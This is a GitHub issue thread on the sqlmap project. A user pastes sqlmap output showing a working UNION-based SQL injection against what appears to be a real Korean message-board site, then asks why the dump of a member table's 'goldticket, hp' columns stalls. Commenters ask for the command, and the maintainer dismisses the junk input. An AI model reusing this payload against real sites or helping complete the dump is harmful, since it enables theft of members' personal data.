### ISSUE TITLE
I cant dump other computer~

### ISSUE THREAD

**Issue by mrblackfree** [sqlmapproject/sqlmap#3614]
[15:27:59] [INFO] testing connection to the target URL
[15:28:04] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: UNION query
    Title: Generic UNION query (random number) - 1 column
    Payload: /bbs/board.php?bbs=win04&bbs=win01&idx=20968&page=&sfield=if(now()=sysdate(),sleep(0),0)/-5518 UNION ALL SELECT 5746,CONCAT(0x716b787071,0x67726a6c454c636547425073774352424b435871534e67477570695050566e4666784247654d6f47,0x716a767871)-- hpaQ'XOR(if(now()=sysdate(),sleep(0),0))OR'XOR(if(now()=sysdate(),sleep(0),0))OR/&svalue=%_st HTTP/1.1
---
[15:28:04] [INFO] testing MySQL
[15:28:04] [INFO] confirming MySQL
[15:28:09] [WARNING] reflective value(s) found and filtering out
[15:28:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2000
web application technology: Microsoft IIS 5.0
back-end DBMS: MySQL >= 5.0.0
[15:28:09] [INFO] fetching entries of column(s) 'goldticket, hp' for table 'member' in database 'sike4u'

and then from there just stopped...
How can i do~

**Comment by huitc** [comment]
what you typed?

**Comment by mrblackfree** [comment]
> what you typed?

same command... but different thing i just copied other computer for log & session.sqlite file...

**Comment by huitc** [comment]
> same command
wtf? really?

**Comment by fgeek** [comment]
What was the original command?

**Comment by stamparm** [comment]
I can't comment on something where clearly a JUNK has been used `...if(now()=sysdate(),sleep(0),0)...`. There are more than enough checks and warnings to prevent this kind of JUNK, but obviously I failed
